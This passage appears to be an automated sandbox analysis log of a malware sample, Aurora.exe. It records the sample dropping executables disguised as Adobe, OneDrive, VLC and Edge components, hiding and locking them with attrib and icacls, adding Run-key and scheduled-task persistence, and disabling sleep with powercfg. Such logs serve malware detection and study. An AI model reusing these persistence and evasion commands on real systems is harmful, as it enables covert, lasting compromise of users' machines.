                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe"
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe "C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String'
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Msedge.exe C:\Users\user\AppData\Local\Msedge.exe
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe "C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1480
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Msedge.exe "C:\Users\user\AppData\Local\Msedge.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Msedge.exe "C:\Users\user\AppData\Local\Msedge.exe"
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lygkxs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe "C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe "C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe "C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1480Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe" && exit" && && exit "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 1Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /fJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmdJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Msedge.exe C:\Users\user\AppData\Local\Msedge.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /fJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                      Source: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                      Source: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe #cmd
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lygkxs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                      Source: C:\Windows\System32\conhost.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeSection loaded: vcruntime140_1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
